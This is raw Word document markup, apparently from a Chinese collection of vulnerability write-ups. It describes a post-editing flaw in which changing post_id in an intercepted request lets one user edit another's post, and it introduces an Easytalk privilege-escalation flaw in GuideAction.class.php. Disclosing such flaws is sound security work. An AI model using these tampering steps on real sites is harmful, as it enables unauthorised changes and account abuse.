            <v:rect id="_x0000_s5190" style="position:absolute;left:785;top:218;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5189" style="position:absolute;left:885;top:218;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5188" style="position:absolute;left:985;top:218;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5187" style="position:absolute;left:1085;top:218;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5186" style="position:absolute;left:1185;top:218;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5185" style="position:absolute;left:1285;top:218;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5184" style="position:absolute;left:1385;top:218;width:1687;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5183" style="position:absolute;left:3072;top:218;width:800;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5182" style="position:absolute;left:3872;top:218;width:361;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5181" style="position:absolute;left:5;top:511;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5180" style="position:absolute;left:185;top:574;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5179" style="position:absolute;left:285;top:574;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5178" style="position:absolute;left:385;top:574;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5177" style="position:absolute;left:485;top:574;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5176" style="position:absolute;left:585;top:574;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5175" style="position:absolute;left:685;top:574;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5174" style="position:absolute;left:785;top:574;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5173" style="position:absolute;left:885;top:574;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5172" style="position:absolute;left:985;top:574;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5171" style="position:absolute;left:5;top:837;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s5170" type="#_x0000_t75" style="position:absolute;left:185;top:900;width:520;height:200">
              <v:imagedata r:id="rId60" o:title=""/>
            </v:shape>
            <v:shape id="_x0000_s5169" type="#_x0000_t202" style="position:absolute;left:3;top:3;width:6750;height:1343" filled="f" strokecolor="#ccc" strokeweight=".24pt">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                    <w:pPr>
                      <w:spacing w:before="10"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman"/>
                        <w:sz w:val="15"/>
                      </w:rPr>
                    </w:pPr>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr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error(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编辑失败</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>');</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="112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4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="38" w:line="568" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="640"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="268071431" behindDoc="1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712846</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4055364" cy="1722120"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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364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int="eastAsia"/>
        </w:rPr>
        <w:t>其中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-84"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">doPostEdit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作未</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对权</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>限</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>认证</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>导</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>致可以修改微吧里的任意帖子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起始状</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>态</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如下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1"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">post_id=5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内容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  <w:spacing w:val="-55"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">test02 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">post_id=4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内容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  <w:spacing w:val="-52"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">test01 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="6928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250439</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4165927" cy="1972532"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="10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927" cy="197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eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">test02 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改自己的帖子，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拦</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>截</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-56"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">post </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="57"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改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test01 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的帖子，即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post_id=4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>图</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:sectPr w:rsidR="00292EF3">
          <w:footerReference w:type="default" r:id="rId86"/>
          <w:pgSz w:w="9980" w:h="14190"/>
          <w:pgMar w:top="1340" w:right="1380" w:bottom="1160" w:left="1380" w:header="0" w:footer="978" w:gutter="0"/>
          <w:pgNumType w:start="150"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="4" w:after="1"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="417"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:noProof/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3695651" cy="3780853"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11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51" cy="37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spacing w:before="8"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="6"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="38"/>
        <w:ind w:left="417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结果为</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="8"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="6976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92770</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4207516" cy="1735074"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="11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516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292EF3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="8"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:sectPr w:rsidR="00292EF3">
          <w:pgSz w:w="9980" w:h="14190"/>
          <w:pgMar w:top="1340" w:right="136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0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="12"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="76" w:name="Easytalk垂直权限问题"/>
      <w:bookmarkStart w:id="77" w:name="_bookmark35"/>
      <w:bookmarkEnd w:id="76"/>
      <w:bookmarkEnd w:id="77"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">Easytalk </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>垂直</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>权</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>限</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>问题</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:b/>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>作者：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Ano_Tom</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="108" w:line="326" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">Easytalk </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>处理用户数据的时候未足够过滤，导致可以进行权限提升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晚上习惯性的打开代码分析分析函数，看到了这样一处</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="40"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="148"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>/Easytalk/Home/Lib/Action/GuideAction.class.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:group id="_x0000_s5044" style="position:absolute;margin-left:80.6pt;margin-top:16.15pt;width:337.75pt;height:393.4pt;z-index:7024;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordorigin="1612,323" coordsize="6755,7868">
            <v:rect id="_x0000_s5167" style="position:absolute;left:1617;top:328;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5166" style="position:absolute;left:1797;top:541;width:241;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5165" style="position:absolute;left:2038;top:541;width:800;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5164" style="position:absolute;left:2838;top:541;width:120;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5163" style="position:absolute;left:2958;top:541;width:2600;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5162" style="position:absolute;left:1617;top:834;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s5161" type="#_x0000_t75" style="position:absolute;left:1797;top:897;width:400;height:200">
              <v:imagedata r:id="rId36" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s5160" style="position:absolute;left:2197;top:897;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5159" style="position:absolute;left:2920;top:897;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5158" style="position:absolute;left:3040;top:897;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5157" style="position:absolute;left:4004;top:897;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5156" style="position:absolute;left:4125;top:897;width:843;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5155" style="position:absolute;left:4968;top:897;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5154" style="position:absolute;left:5089;top:897;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5153" style="position:absolute;left:1617;top:1160;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5152" style="position:absolute;left:1797;top:1223;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5151" style="position:absolute;left:1897;top:1223;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5150" style="position:absolute;left:1997;top:1223;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5149" style="position:absolute;left:2097;top:1223;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5148" style="position:absolute;left:2197;top:1223;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5147" style="position:absolute;left:2297;top:1223;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5146" style="position:absolute;left:2397;top:1223;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5145" style="position:absolute;left:2497;top:1223;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5144" style="position:absolute;left:2597;top:1223;width:2048;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5143" style="position:absolute;left:1617;top:1486;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5142" style="position:absolute;left:1797;top:1519;width:916;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5141" style="position:absolute;left:2713;top:1519;width:916;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5140" style="position:absolute;left:3629;top:1519;width:3253;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5139" style="position:absolute;left:6882;top:1519;width:1200;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5138" style="position:absolute;left:1617;top:1812;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5137" style="position:absolute;left:1797;top:1845;width:1000;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5136" style="position:absolute;left:1617;top:2138;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5135" style="position:absolute;left:1797;top:2171;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5134" style="position:absolute;left:1897;top:2171;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5133" style="position:absolute;left:1997;top:2171;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5132" style="position:absolute;left:2097;top:2171;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5131" style="position:absolute;left:2197;top:2171;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5130" style="position:absolute;left:2297;top:2171;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5129" style="position:absolute;left:2397;top:2171;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5128" style="position:absolute;left:2497;top:2171;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5127" style="position:absolute;left:2597;top:2171;width:241;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s5126" style="position:absolute" from="2866,2171" to="2866,2430" strokecolor="#f8f8f8" strokeweight="2.8pt"/>
            <v:rect id="_x0000_s5125" style="position:absolute;left:2894;top:2171;width:241;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5124" style="position:absolute;left:3135;top:2171;width:1250;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5123" style="position:absolute;left:4385;top:2171;width:1014;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5122" style="position:absolute;left:5399;top:2171;width:1050;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5121" style="position:absolute;left:6449;top:2171;width:533;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5120" style="position:absolute;left:6982;top:2171;width:1200;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5119" style="position:absolute;left:1617;top:2464;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5118" style="position:absolute;left:1797;top:2497;width:1400;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5117" style="position:absolute;left:1617;top:2790;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5116" style="position:absolute;left:1797;top:2853;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5115" style="position:absolute;left:1897;top:2853;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5114" style="position:absolute;left:1997;top:2853;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5113" style="position:absolute;left:2097;top:2853;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5112" style="position:absolute;left:2197;top:2853;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5111" style="position:absolute;left:2297;top:2853;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5110" style="position:absolute;left:2397;top:2853;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5109" style="position:absolute;left:2497;top:2853;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5108" style="position:absolute;left:2597;top:2853;width:2651;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5107" style="position:absolute;left:5248;top:2853;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5106" style="position:absolute;left:1617;top:3116;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5105" style="position:absolute;left:1797;top:3179;width:6266;height:200" fillcolor="#f8f8f8" stroked="f"/>
